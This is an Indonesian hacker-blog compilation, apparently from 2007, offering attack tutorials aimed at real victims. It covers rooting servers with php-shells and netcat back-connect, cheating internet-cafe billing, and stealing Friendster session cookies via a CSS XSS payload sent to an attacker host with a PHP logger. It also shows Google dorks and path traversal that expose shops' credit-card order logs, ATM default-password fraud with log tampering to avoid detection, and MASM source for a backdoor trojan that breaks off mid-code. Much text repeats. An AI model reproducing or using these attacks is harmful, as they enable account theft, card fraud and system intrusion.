ni video masih soal rooting, kalo menurut videonya seh kita kudu kudu take over server dulu. minim isa masuk ke webnya pake php-shell. pake r59 kale. aku ndiri lum nyoba seh, coz lum mudenk *nix. ntar deh coba2 oh ya ini pake back konek juga. trus manfaatin nc juga buat listen pas back konek. diriku masih kudu banyak belajar neh :)
| Download Now |
Ngadmin pake remote desktop ([ Blue|Spy)
Video ini nunjukin cara agar kita jadi admin dengan syarat remote desktop target enable
| Download Now |
Ngeroot pake concect-back [ h4ntu ]
Masih inget cara connect back [video back-connect] itu. Nah kali ini kita coba ngeroot dengan pake conek back masih tetep nggunain ./loginx yang ada di http://iahc.net/log/root.tgz dan nc yang ada di http://iahc.net/log/nc
| Download Now |
Ngeroot bind lanjutan [ h4ntu ]
masih inget dengan video yang bind kemaren? masih dunk nah kali ini kita coba lanjutin petualangan kita, ada lanjutannya. Sekarang kita mo cara laen buat ngeroot. bind masih tetep dipake :p. Sekarang kita pake ./loginx sourcenya ada di sini neh...
http://iahc.net/log/root.tgz
| Download Now |
Buat sock [ h4ntu ]
sock? hi hi, ai ndiri lum pati ngarti. tp kayaknya ni kayak proxy. liat aja deh videonya. yang kita perluin kali ini ya tool buat buat socknya dan server buat ni sock. terserah punya ndiri to hasil mbajak :D. vps? http://iahc.net/log/hantu.tgz
| Download Now |
Ssh-tunnel > port fowarding [ h4ntu ]
Hampir mirip dengan sock, kali ini kita coba ssh tunel all we need adalah putty dan server yang akan kita pke. selebihnya liat aja videonya...
| Download Now |
Take over cpanel [ h4ntu ]
video ini hanya berlaku untuk admin site yang ceroboh yap! just cat the config.php :) find /path_to_public_html -name config.php
| Download Now |
Pake tunnel buat IRC [ Blue|Spy ]
ya ampir sama dengan tunelnya si h4ntu. buat komplit
nya liat ndiri videonya yah...
| Download Now |
Bonus kumpulan Tutor Kumpul Bocah
Kumpulan tutor-tutor kumpul bocah seperti cara melakukan inject, buat Redirect Page, log cleaner dan sebagainya selain itu ada script r57 dan c99 juga.
| Download Now |
Bonus kumpulan Medan Hacker Tutor
Kumpulan tutor-tutor dari web medanhacker.
| Download Now |
Bikin mail bomber
Mo bikin Mail Bomber
dengan ini anda bisa mengirim email sesuka anda sebanyak mungkin
Download
Rancangan Mail Bomber
Trus simpen pake nama mailbomber.php jadi deh
dengan ini anda bisa mengirim email sesuka anda sebanyak mungkin
Download
Rancangan Mail Bomber
Trus simpen pake nama mailbomber.php jadi deh
Mencurangi Billing warnet
Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan :)
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan :)
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan :)
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan :)
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.
Deface Friendster
Bagi para Maniak Friendster ini adalah cara untuk menjahilin FS temen anda
untuk caranya download di
Deface Friendster
Mengalihkan halaman pada FS teman
jika anda pernah di kerjain seperti ini untuk menghapus tuh semua anda cukup melakukan
bila pake mozilla : login fs trus klik tools-options-conten-hilangkan centang pada enable java script n enable java trus ok abis itu klik testimonials trus hapus testi yang bikin anda kesal trus log out centang kembali enabel java script n enable java n FS anda kembali normal
untuk caranya download di
Deface Friendster
Mengalihkan halaman pada FS teman
jika anda pernah di kerjain seperti ini untuk menghapus tuh semua anda cukup melakukan
bila pake mozilla : login fs trus klik tools-options-conten-hilangkan centang pada enable java script n enable java trus ok abis itu klik testimonials trus hapus testi yang bikin anda kesal trus log out centang kembali enabel java script n enable java n FS anda kembali normal
Monday, February 19, 2007
Ambil Alih N Curi Password FS
"ini adalah merupakan.... cara yang sedikit agak curang dengan mencuri pass dan login fs milik orang lain... cara kerjanya adalah mengelabui.... orang yang buka fs kita dengan menampilkan gambar ato foto yang menantang... dengan foto tersebutlah kita bekerja...
ingin tau bagai mana cara dan sistem kerjanya....
simak cerita berikut ini...........
knapa meski FS ?
taw deh skrng2 gw so bored. programming? hmmmm bored too.
sudahlah...
ok lah, langsung weh...
syarat :
1. Punya FS (tentunya)
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi
cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :
1. login FS
2. masuk ke profile-->edit profile-->customize
3. pate code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)
naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location='http:///.php?kukis='+document.cookie)
}
a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php
4. buat file cook.php(lihat b)
--------------------------------------------------------------------
{?php
$kokis = $HTTP_GET_VARS['kukis'];
$filename = "cok.log";
'// metoda dengan append append
$handle = fopen($filename, 'a');
fwrite($handle, $kokis);
fClose($handle);
'// redirect-in ke punya tmn lo
echo "{script}document.location='http://www.friendster.com';{/script}";
?}
--------------------------------------------------------------------
Jangan lupa rubah tanda '{' jadi '<' dan '}' jadi '>'
tanpa tanda curek.
trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ....., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit... hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.
ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log
Huh.....Panen gk ya...!!!, ya gmn muka see.... he..he..he
dah dulu ah, ....so boreddddddddddddddddd..........!!!
eh bentar dulu mo kmana..!!! blon beres yeeeeeeeeeeeeeehhhh.
trus kl dah panen gmn ?
nynt dunk..
cari aja nama cookies "friendster_auth=uid" di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja
contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*
trus di apain ?
Buka pake notepad aja :
C:Documents And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt
replace karakter ascii "=" dengan %3D
replace karakter ascii "?" dengan %26
replace karakter ascii "*" dengan %2A
Trus ?
trus, trus mulu ky tukng parkir....heheheh
hapus semua var Cookie, trus isikan text dibawah ini
.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac
ingin tau bagai mana cara dan sistem kerjanya....
simak cerita berikut ini...........
knapa meski FS ?
taw deh skrng2 gw so bored. programming? hmmmm bored too.
sudahlah...
ok lah, langsung weh...
syarat :
1. Punya FS (tentunya)
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi
cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :
1. login FS
2. masuk ke profile-->edit profile-->customize
3. pate code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)
naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location='http:///.php?kukis='+document.cookie)
}
a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php
4. buat file cook.php(lihat b)
--------------------------------------------------------------------
{?php
$kokis = $HTTP_GET_VARS['kukis'];
$filename = "cok.log";
'// metoda dengan append append
$handle = fopen($filename, 'a');
fwrite($handle, $kokis);
fClose($handle);
'// redirect-in ke punya tmn lo
echo "{script}document.location='http://www.friendster.com';{/script}";
?}
--------------------------------------------------------------------
Jangan lupa rubah tanda '{' jadi '<' dan '}' jadi '>'
tanpa tanda curek.
trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ....., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit... hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.
ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log
Huh.....Panen gk ya...!!!, ya gmn muka see.... he..he..he
dah dulu ah, ....so boreddddddddddddddddd..........!!!
eh bentar dulu mo kmana..!!! blon beres yeeeeeeeeeeeeeehhhh.
trus kl dah panen gmn ?
nynt dunk..
cari aja nama cookies "friendster_auth=uid" di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja
contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*
trus di apain ?
Buka pake notepad aja :
C:Documents And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt
replace karakter ascii "=" dengan %3D
replace karakter ascii "?" dengan %26
replace karakter ascii "*" dengan %2A
Trus ?
trus, trus mulu ky tukng parkir....heheheh
hapus semua var Cookie, trus isikan text dibawah ini
.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac
%3DODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk2A
Close smua browser, buka mozilla,......
trus.........., ya lihat disamping kanan "LOGOUT" N Foto victim cakep bukan
????////
Bermain Card Credit Orang Lain
DCShop
Mendowload file log order DCShop pada folder orders!
1. Cari target dahulu Website DCShop di google.com, dengan keyword allinurl:/DCShop/
2. DCShop akan menyimpan file log ccnya di /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
3. Nah.. utk melihat file log ccnya, ada di : http://www.contoh.com/.../DCShop/orders/orders.txt
CommerseSQL
http://packetstormsecurity.nl/0311-exploits/commerceSQL.txt!
1. Cari target dahulu Website commerceSQL di google.com, dengan keyword allinurl:/commercesql/
2. Misalkan kita mendapat target dg url http://www.contoh.com/commercesql/blablabla , maka :
3. Ganti url tsb menjadi -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=
4. Contoh untuk melihat admin config -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
5. Contoh untuk melihat admin manager -> http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
6. Sedangkan utk melihat file log/ccnya -> http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
PDShopro
1. Cari target dahulu Website PDshopro di google.com, dengan keyword allinurl:/shop/category.asp/catid=
2. Kita lihat dulu konfirgurasi databasenya dg mengganti urlnya menjadi : www.contoh.com/admin/dbsetup.asp
3. Contoh target : http://www.marktwainbooks.com/admin/dbsetup.asp
4. Kita akan mendapatkan output kira² dg keterangan sbb:
5. Nah, dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
6. Sekarang, untuk mendownload file sdatapdshoppro.mdb dapat dilakukan dg merubah urlnya menjadi:
7. http://www.marktwainbooks.com/data/pdshoppro.mdb
8. Untuk membuka file .mdb-nya dengan menggunakan program Microsoft Access
9. Try this one!!
Eshop
Mendowload file log order EShop pada folder database!
1. Cari target dahulu Website EShop di google.com, dengan keyword allinurl:/eshop/
2. DCShop akan menyimpan file log ccnya di /cg-bin/eshop/database/order.mdb
3. Nah.. utk melihat file log ccnya, ada di : http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
4. Selamat Mencoba
Cart32 v3.5a
1. Cari target dahulu Website Cart32 min v3.5a di google.com, dengan keyword allinurl:/cart32.exe/
2. Ambil salah satu site hasil pencarian, misalnya : http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
3. Ganti url tsb diakhir stringnya menjadi http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/error <-- setelah string /cart32.exe/ ditambah kata error
4. Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
5. Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
6. Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc's!
7. Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya....
8. Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/ <-- dimana string .exe dihapus/dihilangkan!
9. Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format http://www.contoh.com/cart32/
10. Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
Ok, semoga berhasil!!!!
http://www.sadiegreens.com/scripts/cart32.exe/error
http://marcdavis.com/cart32/cart32.exe/error
ATM Hacking
Apa itu ATM Machine?
Kepanjangan nya adalah Auto Teller Machine ..
Sebuah mesin yang bisa dikatakan sebagai Bank Mini .. Hehehe ..
Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya, karena saya rasa semua orang sudah tahu mengenai mesin ini ..
Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah, apalah .. Capek dude xD~~
Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??!
Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di http://www.sate.name .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas mengenai masalah teknis yang ada xD~~
So .. Lets start the GAME xD~~
Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..
Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya berikan diatas xD~~
Berikut adalah cuplikan dari Manual Book yang saya baca:
To access the Operator Function menu, hold the
Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol
Kalau anda kesulitan untuk login ..
Cara kasarnya juga ada .. Wakakaka ..
Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function ..
Susah memang ..
But no pain .. No gain right?? xD~~
Setelah masuk ke dalam Operator Function .. Anda akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu:
- Operator Password (Ini untuk meng-akses menu dasar struktur ATM)
- Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu)
- Master Password (Mengijinkan anda mengakses penuh mesin tersebut)
Disini adalah kunci dari pembicaraan kita ..
Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..
Dari sana anda bisa melakukan banyak hal ..
Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe ..
Menarik bukan??!
Wakakaka ..
Perihal .. Bagaimana apabila kita terlacak??
Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras
NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu mgkn terjadi. Oleh dari karena itu kami tidak membahas jauh lebih men-detail, berikut juga merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch oleh pihak Tranax: Baca Disini!!! .. Sekian
Sunday, February 18, 2007
Backdoor
Kebanyakan mereka yang udah pada pinter ngebuat tool-tool untuk hacking pada nggak mau bagi-bagi ilmunya, bukan mengajarkan gimana caranya, tapi bagaimana memanfaatkan/ menggunakan tool buatannya, bagiku hal ini sangat menyedihkan karena selain membuat kita jadi pasif juga nggak akan menambah kesaktian kita :).
Sebagai ungkapan rasa terimakasih saya kepada mereka yang sudah rela mengorbankan waktunya untuk berbagi-bagi ilmu baik lewat e-mail, lewat komunitas jasakom, maupun lewat alam mimpi . maka dengan ini saya juga bermaksud untuk berbagi ilmu, tentu khusus bagi yang belum pada tahu aja.
Kali ini saya nggak membahas virus atau keygen, tapi saya akan membahas bagaimana cara membuat program kayak backdoor.
Apa itu backdoor?
Backdoor termasuk salah satu golongan malware atau program berbahaya, kenapa dikatakan berbahaya?, karena dengan backdoor seorang hacker bisa mengendalikan komputer, bisa meremote dari jauh, mencuri data berharga seperti password, pin, data finansial perusahaan bahkan untuk aksi yang fatal, misal: memformat hardisk!.
Cara kerja backdoor
Sesuai namanya cara kerja backdoor cukup sederhana, yaitu dengan cara membukakan pintu belakang dan yang pasti secara diam-diam, pintunya biasanya berupa port, backdoor akan menanti si pembuat backdoor tersebut datang (menghubunginya). Apabila sang pembuat backdoor datang maka backdoor akan membukakan pintu lalu mempersilahkannya masuk dan melindunginya dari pengawasan keamanan, tentu setelah itu hacker (si pembuat backdoor) dapat melakukan apa saja yang dia inginkan dengan leluasa. sangat mengerikan!!
Baiklah dari pada kebanyakan omong, sekarang langsung kita mulai aja tutorialnya.
Sebelum kita memulai experimen ini, sebaiknya kita pelajari dulu teorinya.
Dalam pemrograman jaringan biasanya dibutuhkan yang namanya socket, socket disini maksudnya bukan socket pada jenis-jenis prosesor kayak socket-A, socket 393 atau socket AM2, tapi socket sebagai obyek untuk melakukan pertukaran data (packet) secara byte per byte. begitu juga backdoor, dia juga membutuhkan socket untuk mewujudkan komunikasi. bagi para programmer jaringan, saya yakin pasti dah tahu teori dan cara kerja backdoor ini.
Pada pembuatan backdoor kita harus membuat dua socket, kenapa dua? karena socket tersebut adalah penghubung, misal jika kita ingin ngobrol jarak jauh kita harus pake telpon, si A menelpon si B, maka socket itu bisa kita asumsikan sebagai telpon, dan tidak mungkin komunikasi akan terjadi apabila telponnya cuma satu (cuma si A yang punya telpon), begitu juga dengan socket harus ada dua, yang satu untuk backdoor (server) dan satunya lagi untuk si pembuat backdoor (client).
.data?
sock1 SOCKET ? ; socket pertama [ backdoor ]
sock2 SOCKET ? ; socket kedua [ attacker ]
Setelah itu kita butuh yang namanya port, apa itu port?, berdasarkan wujudnya port dibagikan menjadi dua jenis, port fisik dan port logika, port fisik itu yang bisa kita lihat langsung di belakang komputer, kayak COM1, COM2, USB dll. kalo port logika itu bisa banyak banget, bisa sampai ribuan dan nggak bisa kita lihat, nah port yang akan kita gunakan disini adalah port logika, kalo tadi socket bagaikan telpon maka port bagaikan kabelnya dan IP address bagaikan nomor telponnya, tanpa itu semua komunikasi mustahil terjadi.
Setelah socket tercipta kita akan tentukan port yang akan kita gunakan sebagai jalur komunikasi, pilih port yang masih kosong atau belum kepake, contoh di program ini saya gunakan port 2194. untuk memasang portnya kita harus terlebih dahulu mengisi variabel pada struktur sockaddr_in yang memiliki rangkaian :
sockaddr_in STRUCT
sin_family WORD ?
sin_port WORD ?
sin_addr in_addr <>
sin_zero BYTE 8 dup (?)
sockaddr_in ENDS
diisi dengan cara :
push 2194 ; nomor port yang akan dibuka backdoor
call htons
mov sockaddr_in.sin_port,eax
Setelah struktur sockaddr_in diisi maka langkah selanjutnya adalah binding :
push sizeof sockaddr_in ; Besar struktur soackaddr_in
push offset sockin1 ; alamat sockaddr_in 1
push sock1
call bind ; binding
cmp eax,SOCKET_ERROR ; socket error
jnz socket_oke ; udah ada atau port udah digunakan
xor eax,eax ; null
ret
socket_oke:
mov eax,1
ret
agar lebih jelas lihat source code lengkapnya di bawah ini :
================[ POTONG DISINI ]===================
;==================================================
; SIMPEL BACKDOOR TROJAN
; WRITTEN BY : [4NV|e]
; anvie_2194@yahoo.com
;
; compile with MASM
; ml /c /coff backdoor.asm
; link /subsystem:windows /opt:noref backdoor.obj
;==================================================
.386 ; 32 bit
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\wsock32.inc
include \masm32\include\kernel32.inc
include \masm32\include\winmm.inc
include \masm32\include\shell32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\winmm.lib
includelib \masm32\lib\shell32.lib
.data? ; .data section
sock1 SOCKET ? ; socket pertama
sock2 SOCKET ? ; socket kedua
sockin1 sockaddr_in <> ; struktur
sockin2 sockaddr_in <>
s2IP dd ?
wsad WSADATA <> ; WSA struktur
hFile dd ?
hBW dd ?
lenn dd ?
.data
AppName db "AnShell",0
szKonek db "Connected : ",0
szLogon db 13,10
db "______________________________________________",13,10
db " __, WELCOME TO : ",13,10
db " | | ___, . __ . . ",13,10
db " |__| ,__ (____ |__ / / | | ",13,10
db " | | | | ,____) | ) \/__ |__ |__ ",13,10
db 13,10
db " By:[4NV|e] ",13,10
db " this stuff is for education purpose only ",13,10
db " Source : www.jasakom.com ",13,10
db "______________________________________________",13,10
db 0
szMasuk db "[ You already entered system ]",13,10
szPerintah db "Command : ",0
szSelesai db 13,10," - thanks for visiting",13,10
db " - [4NV|e]",13,10
db " - anvie_2194@yahoo.com",13,10
db " - www.anvie.net.tc",0
szSocketError db "shit, socket error",0 ;what the fuck!
szPerintahX db "Command not found.",13,10,0
szKosong db 13,10
szOpen db "Open",0
; perintah-perintah
Perintah1 db "msgbox",0
Perintah2 db "close",0
Perintah3 db "shell",0
Buffer db 512 dup(0) ; buffer
Buffer2 db 512 dup(0) ; buffer
KeepOF dd 0 ; buat jaga-jaga biar gak terjadi buffer overflow
.code ; .code section
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
StartUp proc ; prosedur awal pembuatan socket
push offset wsad
push 0101h
call WSAStartup
push 0
push SOCK_STREAM
push PF_INET
call socket ; buat socket utama (server? :P)
; backdoor!
mov sock1,eax
mov ax,AF_INET
mov sockin1.sin_family,ax
xor eax,eax
mov sockin1.sin_addr,eax
push 2194
call htons ; Buka port 2194 (Lucky Number ;)
mov sockin1.sin_port,ax ; masukin port ke struktur sockaddr_in
mov eax,sizeof sockaddr_in
push eax
push offset sockin1
push sock1
call bind
cmp eax,SOCKET_ERROR ; apakah socket oke ?
jnz socket_oke
xor eax,eax ; tidak, return 0
ret
socket_oke: ; oke, yeah return 1
mov eax,1
ret
StartUp endp
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
BersihkanBuffer proc uses edi lpBuffer:DWORD,jml:DWORD
xor al,al ; Isi buffer jadikan nul byte
mov edi,lpBuffer ; dibutuhkan di lingkungan assembly
mov ecx,jml
rep stosb ; mnemonik stosb mengeset alamat edi
; dengan nilai dari eax
ret
BersihkanBuffer endp
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
Tarjim proc lpCommand:DWORD ; prosedur untuk menerjemahkan perintah
LOCAL lBuffer[512]:BYTE ; untuk dieksekusi.
LOCAL arg:DWORD
LOCAL arg2:DWORD
push lpCommand
call lstrlen
cmp eax,2
jne perintah_ok
ret
perintah_ok:
lea edi,lBuffer
push edi ; selamatkan edi ke stack
;
push 512
push edi ; bersihkan lBuffer
call BersihkanBuffer
mov edi,lpCommand
mov al,020h ; cari byte 20h dimana 20h=karakter spasi
mov ecx,512 ; simpel deteksi argumen
repnz scasb ; cari!
dec edi
test ecx,ecx ; apakah karakter spasi ditemukan?
jnz cmd_ok ; jika ya goto cmd_ok
mov edi,lpCommand
mov al,0dh ; jika tidak, cari karakter enter (0dh/13)
mov ecx,512
repnz scasb
dec edi
mov byte ptr [edi],0 ; jika ketemu set null byte
jmp no_arg ; argumen tidak ada goto no_arg
cmd_ok:
mov byte ptr [edi],0 ; nullkan karakter spasi
inc edi
mov arg,edi ; simpan argumen pertama
push edi
call lstrlen
add edi,eax
sub edi,2 ; nullkan 2 byte terkahir maksud 2 byte terakhir
mov word ptr [edi],00 ; disini adalah 0ah 0dh (enter)
no_arg:
pop edi ; kembalikan edi dari stack
push lpCommand
push edi
call lstrcpy ; kopikan string perintah ke buffer
push offset Perintah1
push edi
call lstrcmpi ; compare string insensitive
or eax,eax
